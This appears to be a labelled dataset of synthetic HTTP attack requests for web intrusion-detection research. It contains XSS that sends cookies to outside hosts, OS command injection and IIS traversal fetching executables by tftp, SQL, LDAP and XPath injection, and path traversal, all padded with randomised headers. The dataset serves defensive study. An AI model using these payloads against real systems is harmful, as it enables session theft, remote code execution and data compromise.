GET /omiolAIfia/Z2uerMuq2g@ELy/0e/6otiaTCep6ke/rfBL00RD.g/Tnev/g9@pA/bFT-T6w3gNik-gA/RF/e5slZyt9bytmtlnyDrp/vd.0P_HY.sh?k0dP_8=oereud5fSltayacs&7yFb=405183715&hz=88&RHiAdJ=et5mcsh%25nnl&s5salbtL9I=a%7CF%2Fmayyinsert+eio&sVwOe4vIx=eyete%27++++or++++1%3C++l%2Fnz%2Fn7r%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D+++or+++%27amhhde%27++++%3D+%27&7qpsUd7ubFeeeo=ja%242e&Reb=726&@admin5F0aLQKC=ekmk6&rsCnonp=deoeeab1me3tvcb&T5dzrf2p=iJONa&urtbhenmlju=de HTTP/1.0
Host: 204.248.86.244
Connection: lwyho
Accept: audio/basic, text/html;q=0.6, application/rtf;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: be-iuN;q=0.5
Cache-Control: max-stale=3393
Client-ip: 253.1.218.202
Cookie: bemoE2Ss=1929
Cookie2: $Version="8"
Date: Tue, 02 Dec 08 24:11:41 CET
ETag: W/"gejDXjnrS6tpYzTu_6xQ"
Expect: 100-continue
From: pohawiI@9f0Ofa.ch
If-Modified-Since: Thu, 19 Mar 09 04:49:38 CET
If-Unmodified-Since: Mon, 06 Apr 09 17:52:38 UTC
If-Match: *
If-None-Match: "DCGQMlwt9OyStRuonJp"
If-Range: *
Max-Forwards: 5
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM ZXNScWFmc2VueXpMc3Vlb255ZXNudWVhc2JlZXU1clRzaUhlY2lk
Range: 038-33,-803
Referer: /btesF/Eiraots2/dcwmtem.wav
TE: chunked,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/5.4 (Machintosh; U; Mac OS X 8.8; ax-eo; rv:0.4.9) Gecko/73843538
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 3095x7377
Via: 9.6 125.122.251.44
Transfer-Encoding: deflate
Upgrade: GSoe/1.5, rrhgtt/1.3, efe/7.8, glEFPo/9.7, sicV8/5.3
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 242.32.16.78
X-Serial-Number: 9273829516846529
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49767
Start - Id: 38112
class: LdapInjection
GET /yc8tbt/hIfgyfsmtsmOr6n8can/N8/u913g1fNsru_U62w2AV1/eFXf.jpeg?oido0iRivaohhe=yg&ea2Nenieloo=acan%29%28%26%28objectClass+%3D+++es*%29&choanadmenre=u8eitp%3EkieeIn&aswogrghe=727883&embeei8EDta=2rlDHst&tnaftrcssice=ind9&i6tRpeelrgC=basdooEUd1b6ose&aswedtawVDae=o&s2hboot.ini4AXmkC=47341&cAxfh=neyh&9eerau=9928572683 HTTP/1.0
Host: www.7neee5otm.gov
Connection: rtefz4
Accept: text/plain, text/xml
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 33.244.156.204
Cookie: vs=250147950;varNjEsl4=428094898;vscaeirkgsoe=1;7c0lNk=83066;cztp=rMh
Cookie2: $Version="708"
Date: Thu, 11 Jan 07 02:20:21 GMT
ETag: W/"Irr4LufP3gSyFhulv"
Expect: 100-continue
From: ithsetus@ennnrj.net
If-Modified-Since: Sun, 23 Mar 08 09:58:39 UTC
If-Unmodified-Since: Tue, 12 Sep 06 15:39:28 UTC
If-Match: "0VvPD1egPVWx_GJdM"
If-None-Match: "mb2XVUzDm9CCoVdc"
If-Range: *
Max-Forwards: 73
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest opaque="r4lciIea"
Authorization: Basic OWVoYTBzc3I6ZWxoZm9lcw==
Range: 374-04,-39076,8-6331
Referer: http://aheMq.de/bZwIe.sh
TE: deflate;q=0.4,gzip;q=0.3
Trailer: Trailer
User-Agent: Mozilla/6.4 (X11; U; Open BSD i386 1.1; ni-tU; rv:7.5.0) Gecko/15061300
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3700x2595
Via: Mslte/1.2 www.esrLVo.png
Transfer-Encoding: deflate
Upgrade: ifowud/4.0, tto/4.9, xoi/9.2, yMow/1.8, ttyat/1.1
Warning: 773 www.pns3h.shtml:30 "Bia6nnelerntsir" "Mon, 07 Aug 06 12:34:20 UTC"
X-Forwarded-For: 174.234.21.215
X-Serial-Number: 2885123328233620
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38112
Start - Id: 46892
class: XSS
PUT /2toydrsfonaina/ssduse49qktddtRtw/nu.php3? HTTP/1.0
Content-Length: 460
Content-Language: quthp,oz8atkES
Content-Encoding: compress
Content-Location: /e4ot/chp73y.conf
Content-MD5: VHRuRWNOc2RzZXN1MW5peA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 01 Mar 09 03:37:36 UTC
Last-Modified: Thu, 31 Dec 09 16:40:37 UTC
Host: www.de4r.uk:80
Connection: teaThnl
Accept: text/html;q=0.8, video/*;q=0.1, image/*;q=0.0
Accept-Charset: *
Accept-Encoding: compress;q=0.3, identity;q=0.5, compress;q=0.7, gzip
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 164.249.24.153
Cookie: JD1phpvarbinputC-B-=8PuBY;mo2=ovXiWrSQ;qx1-script=e-lpRmdkb9;ComkoIF=oaOsc2
Cookie2: $Version="07"
Date: Mon, 08 Feb 10 10:21:02 GMT
ETag: "NzR-ApOJwLt0kq3"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Tue, 03 Jan 06 17:07:34 GMT
If-Unmodified-Since: Tue, 27 Apr 10 18:52:24 CET
If-Match: "pnDiXMSWaz02KzTcSk-2"
If-None-Match: *
If-Range: "n2D51t7HJusGuEd7"
Max-Forwards: 484
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /seany/tulte.css
TE: trailers,trailers,deflate
Trailer: Transfer-Encoding
User-Agent: pnaasuenwd/8.0
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 436x6036
Via: tWfos/8.2 250.12.26.107, sar/1.4 111.11.79.32, 8.3 19.189.58.4
Transfer-Encoding: compress
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ------------------
~~~~~: ~~~~~~~~~~~

medifaoroaldl=0597&e1ieAN=46811&htsSe=12944932&enetedsy=62135&imLasol=ehgcm0MjnXr&tacueoeoE9d=g g&Mmr=09&6onsiOoLhl=5nrT@9e7qd&A1IgEru=nnotEu>e]link9c;-rrsock_streams&itciptneelchn=<img src ="  nsnaieol  >    " onmouseover   = " [document.location.replace    ('http://www.nalastnd.com/cgi-bin/naes.cgi'+document.cookie);]   "  >&Sic=5&apuce0aeEmldnoa=wtT&DVS-=0940924&odur=erB&oiu0td=\objecta\\eo7/kn

End - Id: 46892
Start - Id: 43054
class: OsCommanding
POST /eO2nvsneo1Ntiulee/hRCRE5-O_/ece6d2npmtf1eju9gen/eckroReh9aEens9/Lbhrxch.jpeg? HTTP/1.1
Content-Length: 300
Content-Language: n3S3n
Content-Encoding: gzip
Content-Location: /kratr/escusdis.conf
Content-MD5: emxiaWFlenhmSnJpOG9scg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 10 16:30:08 UTC
Last-Modified: Wed, 09 Feb 05 05:00:32 CET
Host: www.rad2nIgnih.cz
Connection: close
Accept: video/*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tdj1o-nae5d;q=0.8, Nfe6pth-taoaDe;q=0.4, tmiulo-n;q=0.3, wTxesyRm-atDn, hp5eef-f2oIo;q=0.8
Cache-Control: no-transform
Client-ip: 200.48.70.10
Cookie: atj5=987;4TcwycgihrNdsv=m;oiItcStcud=08869669
Cookie2: $Version="392"
Date: Fri, 23 Apr 04 19:39:43 GMT
ETag: "9_iNTBloZki0GevqWne"
Expect: 100-continue
From: oaHns@cadrMc1.ch
If-Modified-Since: Mon, 18 Aug 08 07:38:29 CET
If-Unmodified-Since: Sun, 30 Mar 08 18:38:01 GMT
If-Match: "xq-xA0QgKXNFJcwSct"
If-None-Match: *
If-Range: Fri, 07 Apr 06 12:26:30 CET
Max-Forwards: 6030
MIME-Version: 1.6
Pragma: sn1irB=8styrt
Proxy-Authorization: zaetf rssn=ghd0r
Authorization: Digest algorithm=MD5
Range: -300480,70515-77810,-4510
Referer: http://www.gptadvsE.st/aEqt5/ryauauit/iFhyacr/inhn.jpg
TE: gzip
Trailer: Connection
User-Agent: krtlts/5.0.1.3
UA-CPU: 68000
UA-Disp: 575,612,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2695x320
Via: 7.8 www.Ttio1g.htm, FTP/1.2 www.T3ranl6r.css
Transfer-Encoding: deflate
Upgrade: tun3o/7.3, omna/4.0
Warning: 949 www.umlpttl.html:72 "q3sco" "Sat, 17 Jul 04 20:43:31 GMT"
X-Forwarded-For: 121.83.206.9
X-Serial-Number: 4268812
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

dpcIxycs6=tmai&ant1eceh=dwyGzaBdB&mtdo=649&Ra=ketps7adr(open&epia4hu=r$>o2prrkv<i (n&PqYr=tftp    -c   get 98.164.40.13:/chla/tetomech.exe    |&bEwus2trb=e1xEBLYkY.aG&2ttHd9atzk5k=eW3eWPcSu9o&sa=$o]&nsurlaoi=alldit5:'telnetcaaavbscriptdxp_fromhTvar&sDaccess_logbody53-=ytmNs

End - Id: 43054
Start - Id: 47491
class: XSS
GET /21./ifT.XT@ZWigqAunr/anr/TbH/r0Cv4WD0w/isidcqedoda.jsp?9O-fH=29907&ot=eIVDsjlpl2L&tSezc=%3Cdiv+++++style+++%3D++%22+behaviour%3A+url%28%5Bhttp%3A%2F%2Fwww.roarmeve.com%2Fscript%2Fzrihji9dAE.msf%5D%29%3B+++%22+%3E HTTP/1.1
Host: www.qa1to4n.ch
Connection: close
Accept: text/*;q=0.9, video/quicktime
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: stolo-odEnrjs;q=0.1, i-omcsst9, Useonl-m5, vev-qliba
Cache-Control: max-age=40
Client-ip: 229.228.100.156
Cookie: tnsl=rl;8u_B=i9XKHvJVMrtR;g72merog=YpNAa
Cookie2: $Version="751"
Date: Wed, 31 Jan 07 24:00:52 UTC
ETag: W/"NSxL_5tTC4DMTJwF"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Thu, 31 Jul 08 17:37:27 GMT
If-Unmodified-Since: Sun, 31 Aug 08 12:28:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 556
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic aXJvZXA6Y3NlYWFyYg==
Authorization: NTLM aWVxcDJhdDdkc2RhZWVkaFM3YTBkeW5sZmc5bG1wcHl1RWlvZW9tc25sZQ==
Range: 9183-933,-0
Referer: http://www.5hncre0.biz/dt4tnlTy/exNrij2a/e7en4o/hnioxmt.php3
TE: gzip,gzip;q=0.2
Trailer: Authorization
User-Agent: hyahlr/7.8.2
UA-CPU: x86
UA-Disp: 612,9205,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 747x653
Via: gIrrrH/6.6 www.rcjtdn.jpeg, tra/8.9 www.ahsnPpb7.htm, 6.1 www.nsoaofvo.tiff
Transfer-Encoding: compress
Upgrade: qeobOo/1.5, nnmpa/1.1, ijxs/9.6, yly/6.2, grn/3.6
Warning: 377 www.ttf1aee.tiff:8 "utk7eeufto6reia" "Thu, 23 Jul 09 20:34:19 CET"
X-Forwarded-For: 223.101.141.206
X-Serial-Number: 48112496441051
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47491
Start - Id: 41181
class: SqlInjection
GET /o2musi/aQKnxBVQLZLJ/aMFaK@a5tmp4Cbetween5Tf/thHkl/nhe/uZZtsQ7/nE15AnomNpsnxnlim/nFgkILr@z/inB/tvn8grEeer/ro/shUNRZf.php3?eouTks=ninbnncutardd&rfs3riue6f0y=3020424993&9HAbT2Vyf=ts&4dnhewtHleC8=tld&rwp-qxJENDQ=%27vc&2JsernNo=74535&fons8hae=64qQhEdmdn&aWo=946&l7s=5719438291&utadianna=474&wtdnEw2s=reto%26hnullp7Ritt&TlLlVJsDf=aH5q0lK&1y4ME7=hajametadEed7xh%3Bdndtsn%29&ifs5tsO1deotiOr=TgSXDsecrmlaTt9ca HTTP/1.1
Host: 249.68.181.156
Connection: l4EncoeJ
Accept: image/*;q=0.7, text/xml, application/*;q=0.1
Accept-Charset: euc-jp, utf-7;q=0.4, x-mac-japanese;q=0.8, cp-932;q=0.3, iso-8859-2;q=0.3
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 94.242.254.161
Cookie: elenoesrdaentt=shfte0titie6co
Cookie2: $Version="21"
Date: Mon, 11 Jul 05 22:25:25 CET
ETag: "rCPRKGsYtiLX5mGhQUHw"
Expect: ceo9ee=xhIpcme;toatouM=3tone
From: mecty@ntysdF.de
If-Modified-Since: Thu, 10 Dec 09 21:59:11 UTC
If-Unmodified-Since: Wed, 24 Feb 10 03:17:40 CET
If-Match: "mM3x9E1hhv3-PCTRZ"
If-None-Match: *
If-Range: Mon, 14 Mar 05 21:47:03 CET
Max-Forwards: 4658
MIME-Version: 8.9
Pragma: cY2=tno
Proxy-Authorization: Basic dGxzUDpoZW92aQ==
Authorization: hsbtt Tmleeehe=EdeiNse
Range: -904358
Referer: /dneFure/n9sllr/krdfTscc/5yesncue/sansn.txt
TE: deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: chairs'     UN/**/ION  SEL/**/ECT    ponj   FROM    dba_users  WHERE  himlNg     like   '%25
UA-CPU: MIPS
UA-Pixels: 724x926
Via: FTP/6.4 151.11.99.29, 5.7 63.96.145.22, FTP/3.5 www.st2s1Jr.png
Transfer-Encoding: compress
Upgrade: delaks/6.4, u3ts/7.2, eriEl/2.3, mehun/9.8
Warning: 572 www.ettslzed.tiff "ur5thincCbfLtamlyoaS" "Sun, 21 Jun 09 08:46:44 CET"
X-Forwarded-For: 112.176.54.6
X-Serial-Number: 800944
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41181
Start - Id: 36526
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
Host: www.0id8Eoycte.uk:5
Connection: Rtie
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: gzip;q=0.8
Accept-Language: *
Cache-Control: max-stale
Client-ip: 65.215.179.86
Cookie: HERng=1adirjn]nceLerippasswdyls
Cookie2: $Version="016"
Date: Fri, 27 Mar 09 17:27:46 UTC
ETag: W/"MpfI0bsb1HguCI@Llqy"
Expect: nosdIazv
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Thu, 28 Apr 05 10:29:20 GMT
If-Unmodified-Since: Thu, 24 Apr 08 08:56:53 UTC
If-Match: "3OF@B6v2RpG-mDdi@_BQ"
If-None-Match: "cN7vKw@Q2CXVi1BJhpXV"
If-Range: Wed, 07 Oct 09 24:33:45 UTC
Max-Forwards: 34
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: Basic ZWFwZWVWdXM6a3Q3b2JZ
Range: 17-
Referer: http://www.mtNhttk.ch/neaes7k/ofamo/benmcho/cctntad/a5bi.exe
TE: deflate;q=0.8,gzip
Trailer: Host
User-Agent: tbio (gfHniyX.x; dE8Rqk; l-ShPBGX-; ir1PjYiPE-)
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 547x5195
Via: 8.9 www.kttt.shtml:6, em6/1.6 194.252.1.84, 3.0 38.37.57.232
Transfer-Encoding: compress
Upgrade: r1teH/3.1, tnlo/6.6, Mbo1ue/5.1, faabak/8.4, hontz/8.0
Warning: 048 www.e6frT.shtml:3476 "eA38Htn4cp4sefaeTVr" 
X-Forwarded-For: 150.134.65.172
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36526
Start - Id: 45301
class: PathTransversal
GET /t.MM/nlarabt36iu8osas/rkPef/a@MQeh9Er2NNk_QUjOO/ai82re/rGOYK8Frc0q70.pl?ZTWnullil6zinputZ=282 HTTP/1.0
Host: 168.35.211.222:799
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: \WINNT\system.ini
Accept-Language: o-eEeie;q=0.4
Cache-Control: max-age=3
Client-ip: 27.71.37.6
Cookie: oardnlnszm4swt=p
Cookie2: $Version="84"
Date: Mon, 05 Feb 07 03:40:16 CET
ETag: "vVqibifa7ZIDnx45ss"
Expect: ad3yai
From: pagitt@cjt8x8s.it
If-Modified-Since: Wed, 17 Oct 07 09:14:33 CET
If-Unmodified-Since: Thu, 28 Oct 04 15:34:23 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 21 Jul 04 24:05:53 CET
Max-Forwards: 636
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM RXMxb2FkaVJlYWV0bjFhY3NzczRFaWhtRWVvcm43NHdqc01zb2lsczM=
Referer: /iwyDRate/edtaL.tiff
User-Agent: argtoews (nattlllEz; g4WMpRjCvq; 9Oz.@PCzPr)
UA-Color: color32
Via: HTTP/9.7 189.17.17.213:659, 1.9 173.104.25.188
Transfer-Encoding: gzip
Upgrade: eoc/0.4, w5qFeo/8.6, 8aald/8.9, Neo9gn/0.6, nirnu/4.7
X-Serial-Number: 2587775

null

End - Id: 45301
Start - Id: 47601
class: XSS
GET /4ootw.jpeg?q6h4aq5ioevo=7493&gsatnuonIt=zIhoscf&TdPCu7BRw8Sc=w+&rc9ehbue=%3Clink+rel+%3D++++%22++++stylesheet+++%22+++href++++%3D++++%22+++++javascript%3A%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.ic.com%2Fcgi-bin%2Fie.cgi%27%2Bdocument.cookie%29%3B%5D+%22+%3E&cnomtenOentiw=8207467&ptc0k=173144 HTTP/1.1
Host: 125.155.156.240
Connection: keep-alive
Accept: text/xml;q=0.3, application/*;q=0.5
Accept-Charset: windows-1257;q=0.6, cp-950;q=0.1, utf-7;q=0.5, x-mac-cyrillic, cp-932
Accept-Encoding: *;q=0.3
Accept-Language: keay-Fs;q=0.1
Cache-Control: no-cache
Client-ip: 154.17.60.227
Cookie: eh=nShLD98;IUexecJPUWsystemY=4;aae=a7on;tezasrxihiie=lsdmteciSt gI;satt6ylhe=cT2X0;3N5KXqZ=h
Cookie2: $Version="9"
Date: Thu, 18 Feb 10 13:31:44 UTC
ETag: W/"bU9.8Ix3.rrbQf8zaHN"
Expect: pUonr4u1
From: zl3e2@1ftosH.com
If-Modified-Since: Tue, 05 Oct 04 20:04:03 CET
If-Unmodified-Since: Thu, 27 Dec 07 14:54:50 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Apr 10 22:18:15 UTC
Max-Forwards: 7
MIME-Version: 8.3
Pragma: Skaeuth=gEshlD
Proxy-Authorization: Digest qop=auth-int
Authorization: Basic aXQwcjk6ZWludA==
Range: 849916-
Referer: http://www.pshpf3to.de/n503/Nihtitcj/iS9ps1n/aebtt4t/mogwr1a.nsf
TE: chunked,gzip,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/5.6 (Windows; U; Win98 1.9; Ae-Ce; rv:0.9.3) Gecko/02006277
UA-CPU: MIPS
UA-Disp: 3299,575,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: 2.8 40.37.142.166, 6.3 www.sbremu.tiff, 9.6 62.131.43.5
Transfer-Encoding: deflate
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 373 www.dtPeNLcw.css "mneticNase4" 
X-Forwarded-For: 28.174.36.198
X-Serial-Number: 2524902769036083814
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47601
Start - Id: 41436
class: SqlInjection
PUT /ls0oi/tyw8r0FV/34Ixr/e5b@LRslp1j3ndozQXu/2-HWetc0T9i2FdropxcT/etenellnsll2SwcghToE/rYh4aRio/mqer4.gif? HTTP/1.1
Content-Length: 333
Content-Language: a,toeram,iu44
Content-Encoding: compress
Content-Location: /aetas.swf
Content-MD5: NXRncDYwdGd1eG5oYW5uYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Aug 07 12:11:03 UTC
Last-Modified: Mon, 19 May 08 08:51:37 GMT
Host: 188.217.31.192
Connection: keep-alive
Accept: video/mpeg, video/*;q=0.3
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.7
Cache-Control: min-fresh=136
Client-ip: 196.211.227.198
Cookie: rtbh19h=8351;drrhe2n7tstghh=anouig;taNhiotalNwtno=hzb3 m5systemDu=2dt;et8=e rsiealtdocumentw;rrfedeiwimyhb=6329
Cookie2: $Version="67"
Date: Thu, 09 Mar 06 12:52:37 GMT
ETag: W/"VY5DZ71S9_MGkrI4yJ"
Expect: enoavte1=egee
From: m7bmf@6ittvesi.net
If-Modified-Since: Thu, 08 Jun 06 17:27:45 GMT
If-Unmodified-Since: Tue, 06 Oct 09 09:16:45 UTC
If-Match: *
If-None-Match: "fC_FxN4kEMgnWxAyW925"
If-Range: ".lXwLS1Jjq6vq.LA56g"
Max-Forwards: 8260
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM b3R1aG44RW51a05sdXQzdGV6Y3RlNGlmbHc0ZHJnZWE3c3RvZWw=
Authorization: Digest response="5fBFD8A94ABDA9Ec3fD7C95f5A3C4CE1"
Range: -86
Referer: /n9pnn.pdf
TE: deflate;q=0.2
Trailer: Date
User-Agent: Mozilla/6.4 (compatible; MSIE 0.1; Open BSD i586; bd0qbfz; tCoE)
UA-CPU: MIPS
UA-Disp: 5047,1180,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 738x118
Via: 8.9 24.50.34.127, HTTP/9.4 www.XAlLzhc.jpg
Transfer-Encoding: identity
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 594 www.eduo.css "iv5whwy" "Sun, 10 Aug 08 19:07:44 UTC"
X-Forwarded-For: 47.63.17.194
X-Serial-Number: 9168693821015244526
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

hSgAv0rZ0Y2=lIE&Cx57b_o=EsltvtHe9shntt7gel&ouH6K5=4425&stiaeif4dTIdcrr=dga&denasty=oolvqStTf1&LpositionX_B=85907&miuIecaeei=imf5ia&W_logdsam@Zlo=5awcwutrtm&wxhc0r=16&1zEt=tqootjps&OWHW3=o&NTRtmpPstdin5vGDBp=n26qrhant&pzaenbtueu=rea;htfi-i s7OsIr&usw=';   insert  into oer  values(666,'rmritut','tRls',0xfffff)

End - Id: 41436
Start - Id: 43469
class: OsCommanding
GET /t4/t06luGAAin/dnNwPOa.jpeg?liaia9s9enk4=%27++%3B+++++ps+-aux+++++%3B&jchnSeledolhse=lgrmetasystemSfd%7CA3autoexec8tsr0%3A0&naacyduqipcfeiy=7145&o0tWA7o8iab=5&ethzl0eilE=da&euehlInlteGe1=831942253&iXht=mTu%2BEio&qp4ntilnoei=ondeleteas&lipiqHg=189981&U0D_6perlGB=1&ibuktaassmpnohh=nlE5&EZ.bjFE8stdin=4Ks4E3&Vawrxtt=ia%3Cn&hZcey=6 HTTP/1.1
Host: www.9ht2btnn.cz
Connection: ce7kc1er
Accept: application/*, application/*
Accept-Charset: x-mac-hebrew;q=0.5, x-mac-cyrillic;q=0.3, iso-8859-4
Accept-Encoding: deflate;q=0.6, identity, gzip
Accept-Language: *
Cache-Control: max-age=3
Client-ip: 5.223.71.17
Cookie: 40objectwhereAUe3=445;oeta9ssb7gfl9=Tpgas
Cookie2: $Version="2"
Date: Fri, 26 Jun 09 07:34:06 GMT
ETag: "W_D-MMI1DqBWzuzV"
Expect: a0e4=fTceith;k6wd=ANnd
From: t3bs@fsiaebtorf.it
If-Modified-Since: Wed, 13 Jan 10 04:11:00 CET
If-Unmodified-Since: Tue, 20 Apr 04 03:39:54 GMT
If-Match: "Maumbc6jt1iRmhTB"
If-None-Match: *
If-Range: Tue, 26 Jul 05 24:13:15 CET
Max-Forwards: 1405
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Digest username="ncuenm"
Authorization: NTLM VDB5YnN1MkRudGdlYXFlc2VkM2pFdWVyT2xhYnNuaGV0RWxlMDFlVG50UjlhczQ=
Referer: /nusiauo/ttriwr/sdkcO1o/aoxH/tkur.jpg
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/8.0 (X11; U; Linux i586 6.2; nr-iu; rv:5.5.4) Gecko/14460975
UA-CPU: Sparc
UA-OS: Solaris
UA-Pixels: 828x8678
Via: FTP/2.2 www.sammgom.tiff, 5.1 216.138.224.167:9, 5.5 143.143.133.255
Transfer-Encoding: deflate
Upgrade: nsae/6.6
Warning: 666 166.163.91.248 "reqnetwydVCbEhnmif" "Thu, 16 Oct 08 05:40:51 UTC"
----: -----------------------------

null

End - Id: 43469
Start - Id: 47213
class: XSS
GET /cco5/r8a-y_jMaGv.shtml?oiatbdl2o=eysO91aRreey2c&l3rrsnQtuvrru=allivoptANeeOti+8ttSAl&of8wKse0osteh=%3Cdiv+style%3D++++%22++binding%3A+++url%28%5Bhttp%3A%2F%2Fwww.an.com%2Fscript%2Fkex.asp%5D%29%3B%22%3E&cleqjrj5tbddsn=85181&nitEfo=dn&NqsithpMathslt=84961687&3GTshutdownPs=ppt0sr0edrdmlaeD&nko=tERDI HTTP/1.0
Host: 26.177.24.100
Connection: stqh3hae
Accept: image/gif;q=0.5, application/*;q=0.7, application/*
Accept-Charset: koi8-r;q=0.4
Accept-Encoding: *;q=0.5
Accept-Language: j-HadCe72t;q=0.7
Cache-Control: 1e='dapr'
Client-ip: 220.86.207.11
Cookie: ZLgtelnet_=594649;era=fNd-X;uoes8his0ui4a=ecolaHmU;UJVB6GXL= aeahv
Cookie2: $Version="87"
Date: Sat, 02 Jul 05 01:59:59 GMT
ETag: "sffq97EglwyE3Ups"
Expect: dtpt0epr
From: ceqdbn@v02go.fr
If-Modified-Since: Fri, 14 Oct 05 21:14:44 CET
If-Unmodified-Since: Wed, 07 Jun 06 02:12:35 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Feb 07 19:02:57 GMT
Max-Forwards: 27
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest nc=d8BD2EA9
Range: -7983
Referer: http://eyahtnhr.be/djhTztot.jpg
TE: gzip;q=0.7
Trailer: Cache-Control
User-Agent: tjrai6 (dGFor5yVm; bpfWqt; m3NlM6; bjhbRvh; adojamOM.)
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 286x017
Via: 8.0 196.38.44.197
Transfer-Encoding: compress
Upgrade: sdloi/4.2, a9og/5.3, Who9/3.5
Warning: 326 133.104.64.243 "thlBedsxran6eholh" 
X-Forwarded-For: 255.235.206.195
X-Serial-Number: 04739435468972088
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47213
Start - Id: 47363
class: XSS
GET /Se5gretsaanG5jE/hsOH39QQKRX0Dy4xl/EocopyN/ewdZgTpvj8-/eUeyZ6G-F1tP/qs6rgvsioe1nclstiHw/dmalEgShV.w@qNEyhv.dll?5c0ief=9il&7CNinput9uKeoGEo=r%7Exp_E&exjacm=%3Clink+rel+++%3D++%22++++stylesheet%22++++href+%3D++%22++++javascript%3A++++%5Balert+++%28%27Qwhs%27%29%3B%5D++%22+++%3E&60evalwgetCbinmML=Enhtpassltuatgng5linka&UKSW%uoq00=s%5C%5Cs%3CL%2F1spqin&4La9ps4xntW=agLioweojaxrero&siqkbieayesF3o=s-0Zgzux7FN&ewtttuarrnIs=ReeorrnD&ITmhvafcnin9r=deelpassthrueh1+a04nmochalnihu HTTP/1.0
Host: www.yiSdeh.org
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: nRa46pf-laetl;q=0.4, ojrldli-cnn0seut;q=0.1, tl1r6ttn-tttet, Aad2-os
Cache-Control: only-if-cached
Client-ip: 30.118.108.110
Cookie: edmg3o=yKdY9j-diP;e3px4ln=ac;Oaweih=oq1qe;lSeI6oi=sDi;ooeantjsqef= %and
Cookie2: $Version="004"
Date: Sun, 07 Jan 07 17:38:46 UTC
ETag: W/"PjYKmUAHLLYd8gcE5"
Expect: 100-continue
From: Rlpr@aeautrol.org
If-Modified-Since: Fri, 30 Apr 04 01:22:52 UTC
If-Unmodified-Since: Mon, 13 Jun 05 03:06:57 GMT
If-Match: "nmlIO437YhYhptc"
If-None-Match: *
